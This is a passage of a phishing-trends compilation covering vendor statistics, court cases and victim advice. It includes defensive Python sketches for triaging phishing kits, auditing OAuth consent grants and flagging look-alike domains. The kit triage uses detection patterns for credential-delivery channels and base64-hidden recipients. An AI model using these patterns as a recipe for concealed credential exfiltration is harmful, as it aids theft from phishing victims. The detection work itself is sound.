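    "google_forms": re.compile(r"docs\.google\.com/forms/", re.I),
}
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_emails(text):
    """Addresses that only become visible after base64-decoding a literal."""
    found = set()
    for token in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(token, validate=True)
        except ValueError:  # not valid base64 (bad length or padding)
            continue
        found.update(EMAIL_RE.findall(decoded.decode("utf-8", "ignore")))
    return sorted(found)


def triage_kit(files):
    """Map each file to the delivery channels it uses and collect recipients."""
    report = {"channels": {}, "visible_recipients": set(), "hidden_recipients": {}}
    for path, text in files.items():
        hits = [name for name, rule in CHANNEL_RULES.items() if rule.search(text)]
        if hits:
            report["channels"][path] = hits
        report["visible_recipients"].update(EMAIL_RE.findall(text))
        hidden = decoded_emails(text)
        if hidden:
            # An encoded address next to a send call is the classic sign of a
            # seller's second recipient that the kit's buyer does not see.
            report["hidden_recipients"][path] = hidden
    report["visible_recipients"] = sorted(report["visible_recipients"])
    return report


if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE_KIT).items():
        print(key, value)
```

Recipients and bot endpoints recovered this way are what feed takedown requests and attribution work; a real kit also needs unpacking and deobfuscation steps that this sketch leaves out.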
"Phishing kits changed the rules of the game in this segment of the fight against cybercrime: previously, attackers stopped their campaigns after blocking fraudulent resources and quickly switched to other brands; in April 2021 they automate the attack, bringing phishing pages to replace blocked ones. Automation of such attacks, in turn, leads to the spread of more complex social engineering, which begins to be used in large-scale attacks, and not in point ones, as it was before. This allows representatives of one of the most ancient cybercrime professions to stay afloat," said Yaroslav Kargalev, Deputy Head of CERT-GIB.
It is not enough to fight against "advanced" phishing schemes using classical monitoring and blocking; it is necessary to identify all elements of the attacking infrastructure, blocking not individual phishing pages, but the entire network of fraudulent resources.
Kaspersky Lab: 86 thousand scam resources found in the world
On December 3, 2020, Kaspersky Lab presented the results of its analysis of the most common telephone and online fraud schemes in 2020.
According to Kaspersky Lab, in 2020, the volume of telephone fraud and scam was actively growing. From January to November, the company discovered almost 86 thousand scam resources in the world, of which 62.5 thousand were blocked in the second half of the year. This phenomenon is especially common in the Russian-speaking segment of the Internet. The most popular schemes among scammers in 2020 were:
- reports on various social benefits, including those related to coronavirus infection (about 15.6 thousand such resources were found);
- offers related to bulletin boards, delivery services or food ordering (8.6 thousand such sites were found);
- surveys on behalf of allegedly large companies and brands (6.5 thousand resources were recorded).
The mechanics of such online fraud almost always remain the same: under the pretext of a discount, a favorable promotion or other monetary reward, attackers lure the user to a fake page. Usually the promised amount is several tens or hundreds of thousands of rubles. The size of fake payments is not overstated so that the proposal seems realistic. When a person passes all stages of a survey or questionnaire, he is asked to transfer the "fixing payment" (about 300 rubles). As a result, he does not receive any money, and the "commission" goes to the attackers.
It is worth noting that in general, the number of attempts by users to go to scam pages in 2020 exceeded 44 million.
"If we present the amount of potential damage from the scam in 2020 in rubles, then it could exceed 13 billion. That is how much attackers could get if each attempt blocked by our products to switch a user to such a resource still entailed the deception of at least one person," notes Konstantin Ignatiev, an expert on content analysis at Kaspersky Lab. "We encourage users to be attentive and skeptical of extremely generous offers on the network. Attackers use methods of simple but effective social engineering and play on the desire to earn easy money; as a result, unfortunately, people themselves give them their funds, and sometimes personal or payment data."
Attackers actively tried to make money on users using phone calls. According to Kaspersky Who Calls statistics for Russia, in 2020 spam accounted for 63% of all incoming calls from unknown numbers, and calls suspected of fraud accounted for 5.9%. At the same time, attackers actively used number spoofing technology. Most often, they displayed the phone numbers of financial organizations, government agencies or legal entities.
"In 2020, the number of calls from attackers continued to grow. This may be due to the fact that people spend more and more time with the phone at hand and more often pick up the phone. But at the same time, they do not always have the opportunity to make a balanced decision in the conversation. Often, attackers used a current news agenda to arouse the trust of the victim," said Sergey Golovanov, a leading expert at Kaspersky Lab.
Check Point: The number of phishing attacks on behalf of delivery services increased by 440%
On December 2, 2020, it became known that the Check Point Research team, the research division of Check Point Software Technologies, had reported that in November the number of phishing letters sent on behalf of delivery services increased by 440% compared to October. The sharpest growth was recorded in Europe; North America and the Asia-Pacific region were in second and third place by number of phishing campaigns. Most often (in 56% of cases) fraudsters sent letters on behalf of DHL. In second place is Amazon (37%), in third FedEx (7%).
In Europe in November, the number of phishing letters increased by 401% compared to October. 77% of them disguised themselves as various notifications from Amazon. In the United States, fraudsters sent 427% more phishing messages than in October, and 65% of them were on behalf of Amazon. And in the Asia-Pacific region, the number of phishing attacks on behalf of delivery services increased by 185%, with almost 65% of letters using the DHL brand.
Back in early November, the US Centers for Disease Control and Prevention warned of the dangers of visiting shopping centers during the holidays and recommended shopping online. Online shopping volumes in the country continue to break all records. In the first 10 days of November, in the season of preparation for the holidays, Americans spent $21.7 billion on online purchases - 21% more than in 2019. According to the publication DC360, over the holiday weekend in honor of Thanksgiving in 2020, buyers will spend $38 billion, which is almost twice as much as in the same period of 2019.
However, not only stores prepared for the online shopping boom - the attackers also mobilized forces to earn money on the festive excitement. Now, in addition to fake discount offers and links to store sites, they have become more likely to send phishing letters on behalf of delivery services.
Check Point Research researchers warn that a carefully thought-out scheme uses the entire online shopping system: from discount offers, for example, on Black Friday and Cyber Monday, to the process of delivering orders. Its main goal is to deceive people to disclose the data of accounts and bank cards in order to later use them to steal money. Unlike regular phishing letters, with the help of which fraudsters try to get personal data, information to enter the personal account of an online bank or card data, letters on behalf of delivery services contain various fake messages about problems or offers to track the package.
To resolve the problem or to use the service, you must provide personal or credit card information. Fraudsters did not accidentally start sending such letters in November, since this month many buyers of online stores are waiting for their purchases and more often pay attention to messages from delivery services. In addition, many users are already aware of old methods of fraud during the sale period, and traditional "profitable offers" have ceased to generate income for criminals.
"To protect yourself during online shopping, it is important to follow several simple rules. For example, for different sites, use unique non-repetitive logins and passwords, access the site not by a link from a letter that may turn out to be phishing, but open it through a search engine," recommends Vasily Diaghilev, head of Check Point Software Technologies in Russia and the CIS. "Special attention should be paid to language and errors in letters and domain names: for example, attackers can use the .co extension instead of .com or allow typos in the letter itself."
The statistics and data used in this report were detected by Check Point threat prevention technologies and stored and analyzed in the ThreatCloud. ThreatCloud provides real-time threat information from hundreds of millions of sensors worldwide through networks, endpoints, and mobile devices. Intelligence is equipped with AI-based engines and exclusive research data from Check Point Research, the research division of Check Point.
Group-IB helped Interpol identify phishing criminals from Nigeria
On November 25, 2020, Group-IB, an international company specializing in the prevention of cyber attacks, took part in Interpol's Falcon operation to curb the activities of cybercriminals from Nigeria.
Group-IB: The number of identified and blocked phishing resources increased by 118%
Group-IB, an international company specializing in the prevention of cyber attacks, investigated key changes that have occurred in the field of cybercrime in the world and on November 25, 2020 shared its forecasts for the development of cyber threats for 2021.
According to the Group-IB Hi-Tech Crime Trends 2020-2021 report, 118% more phishing resources were identified and blocked during the analyzed period than before. Analysts attribute this growth to several reasons, the main of which is the pandemic: web phishing as one of the simplest earning schemes attracted the attention of a larger audience that lost revenue. The increase in demand for purchases over the Internet played into the hands of phishers: they quickly adjusted to the "new reality" and began to conduct phishing attacks on services and individual brands, which previously had no special economic effect for them.
A change in tactics is also noticeable. In previous years, attackers stopped their campaigns after blocking fraudulent web resources and switched to other brands. Now they automate the attack, bringing new phishing units to replace blocked ones.
Since the beginning of the year, there has been an increase in advanced social engineering, where multi-step scenarios are used in a phishing attack. In such phishing schemes, which are gaining popularity, the victim is prepared in advance: contact is established with the victim (for example, through a messenger), an atmosphere of legitimacy is created around the interaction, and only after that is the victim sent to the phishing page. This year's trend was the use of one-time links. The user receives a unique link that becomes inactive after it is first opened. If the link has been followed at least once, it is no longer possible to retrieve the same content again to collect evidence. And without that evidence, the process of blocking a phishing resource is significantly complicated.
The largest amount of phishing was created for online services (39.6%). This includes phishing for collecting accounts of Microsoft,, Netflix, Amazon, eBay, Valve Steam, etc. This is followed by e-mail services (15.6%), financial institutions (15%), cloud storage (14.5%), payment services (6.6%) and a newcomer to the list, bookmakers (2.2%). Phishing resources aimed at cryptocurrency projects have almost disappeared due to the fading interest in ICO projects, which were popular with phishers during 2017-2018.
Group-IB: Russia Domain Theft Scheme
On November 19, 2020, Group-IB, a company specializing in cyber security, announced a scheme used by hackers to steal legitimate domains in Russia, which are subsequently used for phishing attacks.
Avast: almost half of Russians faced phishing attacks
On October 28, 2020, it became known that Avast, a company in the field of digital security and security solutions, had published the results of its survey. According to the data received, 42% of Russians had faced phishing, 27% had been its victims, and a little more than a third (35%) could not give an accurate answer. For two thirds of the respondents who faced phishing, the attack concerned personal matters, and for one third it concerned work tasks.
In Russia, most often people encountered telephone phishing.
"Attackers can conduct phishing attacks through a variety of channels, so it is important that people know about them and about current schemes. From January to September 2020, Avast defended an average of 2770 out of 100,000 Russians from phishing attacks every month," says Alexei Fedorov, head of Avast's representative office in Russia and the CIS.
Of the Russians who were victims of phishing, a little more than a quarter (27%) said that they had to change their account passwords, 13% said that money had been stolen from them, and 11% that personal data had been stolen from them. 11% of victims had to cancel credit or debit cards.
Of those who suffered financial losses, 43% lost up to 3,500 rubles, every fifth (20%) lost from 3,500 to 6,999 rubles, 11% lost from 7,000 to 13,999 rubles, 5% - from 14,000 to 20,999 rubles and one of five (20%) more than 21,000 rubles.
"Social engineering is used in phishing attacks to force people to commit the actions the cybercriminal needs. Attackers affect the behavior, psyche of the victim, since it is easier to deceive a person than to hack the system," says Tatyana Shemyakina, psychologist, expert in social psychology. "Fraudsters play with emotions of people, use fear, put pressure on the victim. They may frighten with urgency, make them worried, nervous, or say that they need charitable donations."
Three out of five (61%) Russians affected by phishing did not report fraud. The main reasons why people do not report fraud: they think that the attack is not worth the trouble (30%), they do not know who to report it to (29%), they are sure that nothing will happen anyway if they report (29%), they believe that the information they received is not worth anything (23%).
Of the phishing victims who reported the attack, almost half (49%) reported fraud to the police, 43% to the company whose employee the attacker pretended to be, 26% reported this to their colleagues and 16% told their e-mail provider.
Australia has launched a national program to block phishing SMS using a blockchain
On September 15, 2020, it became known that Australia had launched a national program to block phishing SMS. The solution uses blockchain technology, and the local telecommunications company Telstra is taking part in the project.
The court allowed Microsoft to seize control of 6 phishing domains
In July 2020, Microsoft received a court order to gain control of six domains used in phishing attacks on Office 365 users, including attacks exploiting the COVID-19 theme.
According to court documents, Microsoft targeted a cybercrime group that had been "phishing" and attacking the company's customers since December 2019. Attackers sent emails to companies using mail servers and corporate infrastructure in the Office 365 cloud service[11].
Phishing letters were sent on behalf of work colleagues and trusted business partners. The malicious operation in question differed from others in that attackers did not forward victims to fake Office 365 authorization pages, but used Office documents. When trying to open the file, users were redirected to a page that required them to install a malicious fake Office 365 application.
After the victim installed the app, the attackers gained full access to the victim's Office 365 account (settings, files, email content, contact lists, notes, etc.). In other words, the application allowed cybercriminals to gain full access to the account without having to steal a password, using only OAuth2 tokens.
Microsoft filed a civil lawsuit on June 30 this year and indicated in a statement of claim six domains used by cybercriminals to host the Office 365 malicious application. According to the company, two people are behind the phishing operation. Initially, they indicated in the subject of letters issues related to business, but quickly switched to the topic of coronavirus.
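Because the attack described above works through an application the user consents to rather than through a stolen password, the defensive check is a review of which applications hold which grants. The following is an added example, not Microsoft's tooling: the record layout, tenant, user and application names are constructed, while the scope strings are Microsoft Graph delegated permission names, mapped here to the data categories the article lists.

```python
from collections import defaultdict

# Graph delegated permissions mapped to the data categories named above.
SENSITIVE_SCOPES = {
    "Mail.Read": "email content",
    "Mail.ReadWrite": "email content",
    "Files.Read.All": "files",
    "Files.ReadWrite.All": "files",
    "Contacts.Read": "contact lists",
    "Notes.Read.All": "notes",
    "MailboxSettings.ReadWrite": "settings",
}

# Constructed consent records; field names are assumptions for this example.
# "scope" is a space-separated list, as in an OAuth2 token request.
SAMPLE_GRANTS = [
    {"user": "alice@contoso.example", "app": "Example Doc Viewer",
     "verified_publisher": False,
     "scope": "offline_access Mail.Read Files.ReadWrite.All Contacts.Read Notes.Read.All"},
    {"user": "bob@contoso.example", "app": "Example Doc Viewer",
     "verified_publisher": False,
     "scope": "offline_access Mail.Read MailboxSettings.ReadWrite"},
    {"user": "carol@contoso.example", "app": "Calendar Helper",
     "verified_publisher": True, "scope": "Calendars.Read offline_access"},
    {"user": "alice@contoso.example", "app": "Mail Archiver",
     "verified_publisher": True, "scope": "Mail.Read"},
    {"user": "dave@contoso.example", "app": "Profile Badge",
     "verified_publisher": False, "scope": "User.Read"},
]


def audit_grants(grants, min_categories=3):
    """Group grants by application and flag the ones worth a manual review.

    An application is flagged when its publisher is unverified, it can reach
    at least one sensitive data category, and it either spans several
    categories or holds offline_access (a refresh token, so access continues
    without the user's password).
    """
    apps = defaultdict(lambda: {"users": set(), "scopes": set(), "verified": True})
    for grant in grants:
        entry = apps[grant["app"]]
        entry["users"].add(grant["user"])
        entry["scopes"].update(grant["scope"].split())
        entry["verified"] = entry["verified"] and grant["verified_publisher"]

    findings = []
    for app in sorted(apps):
        entry = apps[app]
        categories = sorted(
            {SENSITIVE_SCOPES[s] for s in entry["scopes"] if s in SENSITIVE_SCOPES}
        )
        persistent = "offline_access" in entry["scopes"]
        broad = len(categories) >= min_categories
        if categories and not entry["verified"] and (broad or persistent):
            findings.append({
                "app": app,
                "users": sorted(entry["users"]),  # how far the consent spread
                "categories": categories,
                "persistent": persistent,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_grants(SAMPLE_GRANTS):
        print(finding)
```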
Attackers use fake CVs to distribute malware
On June 5, 2020, Check Point reported that as unemployment grows, its researchers are finding malicious files masquerading as CVs (a special form of resume). The files attached to the e-mails were in Microsoft Excel format, with subjects such as "job application" or "about work." When the victims opened the attached files, they were asked to "enable content." In fact, after that, the victims downloaded the ZLoader malware. This is banking malware designed to steal credentials and other private information from users of targeted financial institutions. The malware can also steal passwords and cookies stored in victims' web browsers. Using the stolen information, the malware can allow attackers to connect to the victim's system and make illegal financial transactions from the bank user's device.
Check Point researchers note an increase in the number of fraudulent topics in the United States. In April-May 2020, the number of malicious files imitating CVs doubled. Overall, 1 out of 450 malicious files identified was associated with a CV.
In addition, Check Point researchers discovered malicious medical leave forms. Documents that use names such as "COVID-19 FLMA CENTER.doc" infect victims with the IcedID malware, banking malware that targets banks, payment card providers, mobile service providers, as well as online stores. The malware is designed to make users leave their credentials on a fake page. This information is then sent to the attacker's server, along with authorization details that can be used to hack user accounts. The documents were sent by e-mail with subjects such as: "Attached below is a new form for employee leave requests under the Family and Medical Leave Act (FMLA)." Emails were sent from different sender domains, such as "medical-center.space," to encourage victims to open malicious attachments.
"Unemployment is rising, and cybercriminals cannot be inactive at this time. They mimic resumes to obtain valuable information, especially that relating to money and banking. I urge anyone who opens an email with a resume to think twice. You can regret it very much," noted Omer Dembinski, Check Point Cyber Research Manager.
Check Point statistics for June 2020:
- In May 2020, 250 domains containing the word "employment" were registered. 7% of these domains were malicious and another 9% suspicious.
- 1 out of every 450 malicious files detected is CV fraud: double the figure for the previous two months.
- The total number of malicious attacks increased by 16% compared with the period from March to April, when the pandemic was at its height.
- In May 2020, Check Point experts noted an average of more than 158,000 coronavirus-related attacks each week. Compared to April, this is a decrease of 7%.
- Over the past 4 weeks, 10,704 coronavirus-related domains have been registered. 2.5% of them were malicious (256 domains) and another 16% (1744 domains) suspicious.
According to Check Point, to stay safe, you need to:
- Keep track of similar domains. Monitor spelling errors in emails and websites.
- Be more careful with unknown senders. Be careful with files that are received by email from unknown senders, especially if they request a specific action that is not normally done.
- Use valid sources. Make sure that the goods are ordered from a genuine source: it is best not to click on advertising links in emails, but to find the right seller in Google, and click on the link on the Google results page.
- Beware of "special" offers. A "coronavirus cure for 150 dollars," if offered, is hardly credible.
- Do not use the same password more than once. Ensure that the individual password is used for each application and for each account.
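The advice to watch for similar domains, together with the earlier remark that attackers use the .co extension instead of .com or rely on typos, can be turned into an automated check. This is an added example, not Check Point's method: the watch list uses the brands the article names as most imitated, the substitution table is a small illustrative set, and the test hosts are constructed.

```python
import re

# Watch list for this example: brands the article names as most imitated.
BRANDS = ("dhl.com", "amazon.com", "fedex.com", "paypal.com")

# Common look-alike substitutions (illustrative, not exhaustive).
_DIGITS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def normalize(label):
    """Undo digit-for-letter and multi-letter look-alike substitutions."""
    return label.translate(_DIGITS).replace("rn", "m").replace("vv", "w")


def osa_distance(a, b):
    """Edit distance counting insert, delete, substitute and adjacent swap."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i] + [0] * len(b)
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            cur[j] = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                cur[j] = min(cur[j], prev2[j - 2] + 1)  # adjacent transposition
        prev2, prev = prev, cur
    return prev[len(b)]


def classify(host, brands=BRANDS):
    """Return (verdict, imitated_brand) for a host name seen in a message."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return ("unrelated", None)
    name, tld = labels[-2], labels[-1]
    # Assumption: the registered domain is the last two labels. Production code
    # should consult the Public Suffix List so suffixes like co.uk are handled.
    if f"{name}.{tld}" in brands:
        return ("legitimate", f"{name}.{tld}")
    subdomain = ".".join(labels[:-2])
    for brand in brands:
        # A real brand domain used as a subdomain of somebody else's domain.
        if subdomain == brand or subdomain.endswith("." + brand):
            return ("brand-in-subdomain", brand)
    for brand in brands:
        brand_name = brand.split(".")[0]
        if name == brand_name:
            return ("tld-swap", brand)  # e.g. .co instead of .com
        if normalize(name) == brand_name:
            return ("homoglyph", brand)
        # Distance 1 on very short names (dhl) would flag too many real sites.
        if len(brand_name) >= 5 and osa_distance(name, brand_name) == 1:
            return ("typo", brand)
        if brand_name in re.split(r"[-_]", name):
            return ("brand-in-label", brand)
    return ("unrelated", None)


if __name__ == "__main__":
    for host in ("www.amazon.com", "amazon.co", "paypa1.com", "amzaon.com",
                 "dhl-tracking.info", "fedex.com.parcel-status.net", "example.org"):
        print(host, classify(host))
```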
GitHub users are attacked by phishers
On April 18, 2020, it became known that the GitHub platform's Security Incident Response Team (SIRT) warned users of a phishing campaign in which attackers steal account data through landing pages that they pass off as GitHub authorization pages.
2019
The number of phishing kits on the market has more than doubled
On April 15, 2020, Group-IB announced that the market had recorded a sharp increase in sales of phishing kits, "builders" for the mass creation of phishing sites. In 2019, the number of such "goods" on underground forums more than doubled. The growth in demand for one of the most popular tools among fraudsters worldwide also affected the average price: it increased by 149%. Group-IB experts attribute the growing popularity of phishing kits to the low barrier to entry into this market and the simplicity of the money-making scheme.
A phishing kit is an archive file that contains the scripts necessary to create and operate a phishing site. This tool allows attackers who do not have deep programming skills to quickly deploy hundreds of phishing pages, often using them as "mirrors" of each other. When one such site is blocked, the fraudster activates another, when that one is blocked, the next, and so on. Thus, the phishing kit allows attackers to quickly resume the operation of malicious resources, ensuring their own invulnerability. This explains the interest in them on the part of cybersecurity specialists. Detection of phishing kits not only makes it possible to find hundreds or even thousands of phishing pages, but, more importantly, can serve as a starting point for investigations to identify their developers and hold them accountable.
According to the Group-IB Threat Hunting Intelligence team, which analyzed hundreds of underground forums, in 2019 the number of active sellers of phishing sets increased by more than 120% compared to the previous year. As expected, the number of unique announcements placed on these resources has also more than doubled.
The cost of phishing kits has also increased, doubling in 2019 compared to the previous year. On average, the developers asked $304 for a phishing kit, and in general, prices ranged from $20 to $880. For comparison, in 2018, prices for phishing kits ranged from $10 to $824, and the average value was $122. As a rule, the cost of phishing kits depends on their complexity, namely on the quality and number of phishing pages, as well as the availability of additional services, such as technical support from the developer.
Sometimes phishing kits are offered on forums for free. This is not due to the generosity of the sellers, but to the likely presence of backdoors in them, which allow their authors to access compromised data.
Last year, the Group-IB Threat Intelligence system discovered more than 16,200 unique phishing kits. However, their detection is becoming steadily harder: cybercriminals try to hide the use of a phishing kit, remove it from the code or resort to various methods of concealment. So, only 113,460 out of 2.7 million detected phishing pages, that is, 4%, revealed "traces" of the phishing kits used.
The number of unique e-mail addresses found in them also indicates an increase in demand for phishing sets: according to the Information Security Incident Response Center (CERT-GIB Computer Emergency Response Team - Group-IB), last year this figure increased by 8%. This may indicate an increase in the number of their operators.
To attract buyers, phishing set developers use well-known brands with a large audience in them, which in theory should facilitate the implementation of fraudulent schemes for future owners of such sets. In 2019, Amazon, Google, Instagram, Office 365 and PayPal were the most commonly used brands in phishing sets, and Exploit, OGUsers and Crimenetwork were introduced to the Top 3 online sites for trading phishing sets.
"Phishing set developers are the driving force behind the phishing business worldwide. One person can be behind the creation of hundreds of phishing pages and make thousands of dollars from it, for a long time going unnoticed. Therefore, the focus of cybersecurity specialists should shift from blocking phishing pages to finding and identifying the creators of fish whales. In the practice of Group-IB there are a number of investigations, thanks to which it was possible to reveal the identities of the developers of phishing sets. By sharing such information with the relevant law enforcement agencies and ensuring the detention of cybercriminals, Group-IB aims to prevent the further spread of this "disease" and combat not its manifestations in the form of phishing pages, but with its pathogens - the creators of phishing sets, making their work economically unprofitable, " |
Over the years, Group-IB has accumulated an extensive base of phishing sets, which makes it possible to fight phishing aimed at a specific brand. This base is regularly enriched: once the Group-IB Threat Intelligence system detects a phishing page, the corresponding server is scanned for the presence of phishing sets.
Fraudulent use of technology company names and social networks in phishing schemes
On February 11, 2020, IBM published the annual IBM X-Force Threat Intelligence Index 2020, which showed how cybercriminals' methods have changed over several decades of illegal access to billions of corporate and personal records and the exploitation of hundreds of thousands of software vulnerabilities. According to the study, 60% of initial intrusions into victims' infrastructure were carried out using previously stolen credentials and known software vulnerabilities, which allowed attackers to rely less on deceiving users to get access to the data.
The more users learn about phishing letters, the more targeted attacks become. Together with the non-profit organization Quad9, IBM experts have identified a growing trend in phishing: criminals impersonate large consumer technology brands (technology companies, social networks, streaming services) and forge links to their sites for the purpose of phishing.
27% of all phishing attempts occur through email
On February 7, 2020, it became known that Check Point Research, a division of Check Point Software Technologies, a provider of cybersecurity solutions around the world, published its report on the brands most often used in phishing attempts in the 4th quarter of 2019. Attackers most often imitated brands to steal personal information or user credentials during the last quarter, which accounts for the largest number of sales during the year.
In phishing attacks, attackers try to create a site-copy of the official site of a well-known brand, using a domain name or URL, web page design similar to an authentic site. A link to a fake website can be sent to victims by email or in messages, redirected while browsing the web, or launched from a fake mobile application. A fake website often contains a form designed to steal user credentials, payment details, or other personal information.
Top brands that attackers tried to use in phishing attempts in the 4th quarter of 2019:
Ranked by the number of their total appearances in phishing attempts:
- Facebook (18% of phishing attacks worldwide)
- Yahoo (10%)
- Netflix (5%)
- PayPal (5%)
- Microsoft (3%)
- Spotify (3%)
- Apple (2%)
- Google (2%)
- Chase (2%)
- Ray-Ban (2%)
Top ways to distribute phishing messages:
During the fourth quarter, researchers observed differences in how phishing pages were distributed: each category of brands was distributed in its own way. For example, phishing pages imitating social networks and banks were mainly distributed through mobile devices. Phishing letters tied to sales periods, such as Black Friday in November 2019, were usually distributed through email.
Email (27% of all phishing attacks in Q4):
- Yahoo!
- Rbs (Ray-Ban Sunglasses)
- Microsoft
- DropBox
Websites (48% of all phishing attacks in Q4):
- Spotify
- Microsoft
- PayPal
Through mobile devices (25% of all phishing attacks in Q4):
- Chase Mobile Banking
- Apple
- PayPal
Cybercriminals use different methods of attack to trick their victims into entering personal information, credentials or transferring money. Often links to phishing sites come through spam, but sometimes attackers, having received user credentials, carefully study the victim for several weeks and work on a targeted attack on partners, company customers on behalf of their victim to steal money. This method allows hackers to disguise themselves as a confidant. Over the past two years, the number of attacks of this type has increased, and in 2020 phishing will continue to pose a serious threat, says Vasily Diaghilev, head of Check Point Software Technologies in Russia and the CIS.
The Check Point Phishing Report is based on ThreatCloud intelligence, a collaborative network for fighting cybercrime that provides data on threats and trends from a global network of threat sensors. The ThreatCloud database contains more than 250 million addresses analyzed for bots, more than 11 million malware signatures and more than 5.5 million infected websites, and identifies millions of malware types every day.
Kaspersky Lab solutions prevented 38 million attempts to go to fraudulent sites every month
According to Kaspersky Lab statistics, 2019 saw a significant increase in the number of phishing attacks, in which attackers, as a rule, try to obtain users' personal and payment data. This was announced by Kaspersky on January 28, 2020. During this period, Kaspersky Lab solutions prevented an average of 38 million attempts by users to go to fraudulent sites every month. Phishers closely follow the news agenda and use the public's interest in various major events and celebrities, inventing official-looking decoys and tricks that push a person to click on a malicious link or leave personal data.
Hackers with special training attack government agencies around the world
Anomali Inc. experts discovered in December 2019 a large-scale phishing campaign aimed at government agencies around the world. Presumably, its operators are interested in information about centralized procurement projects and tenders[12].
The campaign is well organized and appears to be quite effective. Each phishing letter is unique, formed specifically for a specific department for which it is planned to launch an attack. Victims are redirected to specially prepared phishing sites, apparently completely duplicating legitimate resources. But their only real purpose is to steal access details.
The governments of Canada, China, Australia, Sweden and the United States were attacked. According to experts, the attacks are carried out from Turkey or Romania; at least this is where the domains used in the attacks are located. However, it is not yet possible to say who controls them.
Microsoft named the most unusual types of fraud on the Internet
At the end of 2019, Microsoft published a report on malware and cybersecurity trends in 2019, in which it also described the increase in phishing activity[13][14].
According to Microsoft, the share of detected phishing letters increased from 0.2% in January 2018 to 0.6% in October 2019. While the number of phishing attacks has increased, the total amount of ransomware, cryptominers and other malware has decreased.
In its blog, the company described the three most complex phishing attacks identified this year.
The first is a multi-level malicious campaign in which cybercriminals poisoned Google search results. Fraudsters first directed web traffic intercepted from legitimate sites to their own resources. Having reached the top of Google search results for certain keywords, the criminals sent emails to victims with links to these search results. If the user clicked on such a link, and then on the top search result, he landed on a site that redirected him to a phishing page.
Another malicious campaign was identified in August. Fraudsters used malicious custom 404 error pages to carry out their attacks. While most phishing emails contain a link to a fraudulent URL, in this campaign attackers used links to non-existent pages. When scanning the link, Microsoft security systems detected error 404 and considered the link safe, while in reality the user was redirected to a malicious site. Using subdomain generation algorithms and constantly changing the domain allowed attackers to create a large number of phishing URLs.
The third phishing campaign involved MitM attacks. Attackers collected information related to the target company (logos, banners, text and background images) from the Microsoft website and used these elements to create their own phishing site, which was practically no different from the real one. Next, phishers sent letters with URLs that imitated authorization pages. The victims had the impression that they were on a legitimate page, but the URL displayed in the address bar of the browser could give the deception away.
There is an increase in phishing letters with sexual extortion (sextortion)
Over the past few months, millions of threatening letters have been sent to users around the world. Starting with Germany, and then switching to the UK and other countries, mainly the USA and Canada, anonymous cyber criminals attacked residents of Western countries with phishing letters. These messages usually claim that the perpetrators have a recording of the potential victim made without her consent in her personal time (usually an intimate recording) and that it will be distributed to her friends, family members and co-workers if the victim does not agree to pay a certain ransom. As a rule, cyber criminals provide their potential victim with instructions on how to make a payment using various cryptocurrencies[15].
What if you received such an email?
The best thing you can do when you receive a letter trying to blackmail you is to ignore it. Quite often, when you read such a letter, you can see that it is not personalized and that it is a mass mailing. If you feel that the letter is quite real, and you are very concerned about it, then it is better to report it to the local police.
What should NOT be done when receiving such a letter?
Just don't open the letter. If you receive such an email in your mailbox, all you need to do is delete it and get on with your life. However, if you did open the letter, we advise you not to pay the ransom. Paying ransoms to criminals may not be your only problem: transferring money to strangers can cause state security agencies to contact you, since such a transfer can sponsor terrorist groups. You never know exactly who will get your money, and therefore the best solution is NEVER to pay them. Confronting hackers is also not the best idea: by calling them names or interacting with them, you just make yourself an easier victim. Do not attract additional attention from hackers.
Another important point is not to take such messages personally: cyber criminals send millions of messages daily. Most likely, they don't even know who you are, and your email address is just on their spam list. In short, try not to open such letters, and if for any reason you did, then never click on any links in the text of the letter and do not open any attachments.
Who's behind these extortion letters?
It is currently unknown whether this attack is sponsored by any states or whether individual hackers are behind it. However, it is known that whoever they are, they want profit and they are technically experienced enough to run large-scale campaigns without any consequences for themselves. Today we live in a world where hackers can be either in a house next to you, or on a distant island in the Caribbean or in the center of the Amazon rainforest in Brazil.
How did they target you?
The question we usually hear is how these blackmailers were able to find your email address and target you. Over the past few years, there have been several data breaches, and hackers have stolen billions of email addresses. Often, such email address databases are sold on the black market on the dark web, and almost anyone can download an address list to launch their own email campaign. These phishing letters are usually easy to identify, but when criminals send several million letters, at least a few people are bound to fall for the deception. Hackers expect that even a small percentage of people who received the letter will still follow the instructions and transfer money to their accounts.
How not to be a victim?
Some e-mail service providers, such as Gmail and Yahoo, filter such emails quite well. Therefore, it is safe to say that a significant percentage of fraudulent letters sent to you will never really get to you, because they will not be able to overcome these filters. However, hackers are becoming more creative. If you want to be protected a little better, then you should install premium antivirus on all your devices that are connected to the Internet.
The organizer of phishing attacks will pay its victims more than $1.1 million
A cybercriminal who attacked large companies such as Uber, Sainsbury's, Nectar, Groupon, T Mobile, AO.com and Argos will pay[16] more than $1.1 million in compensation to victims of phishing attacks[17].
Grant West, 27, known online as Courvoisier, began his phishing campaign in 2015. He attacked popular companies to access the financial data of a dozen thousand customers, which he then sold on the darknet for various cryptocurrencies. According to the results of the investigation, West was identified as the leader of the Organized Crime Network group, which attacked organizations located in London. Along with financial data, he also sold instructions for cyber attacks.
Law enforcement officers during the operation codenamed "Operation Draba" confiscated all the funds of the offender. Also in West's house, an SD card was discovered with 78 million unique usernames and passwords, as well as data from 63 thousand bank cards. Further investigation revealed that the offender organized attacks from his girlfriend's laptop. A file named "fullz" was found on the device, containing financial information of more than 100 thousand users.
Having studied the case file, the court decided to sell all of West's confiscated digital currency (worth more than £922 thousand) and pay compensation to the victims.
Telecom operators in Europe blocked an average of 20 million phishing attacks monthly
On July 23, 2019, Allot released a report from the Telco Security Trends series. Based on private and industry research, it examines the rise of phishing attacks, their financial implications, and how service providers can help combat this growing threat.
The main findings were reported to include:
- Phishing is a growing problem for users, businesses and service providers around the world. Consumers are the main targets of these attacks, and they demand greater security for their data and financial information. According to Telco Security Trends Report, during the first quarter of 2019, telecom operators in Europe each month blocked an average of 20 million phishing attacks on devices of seven million mobile subscribers.
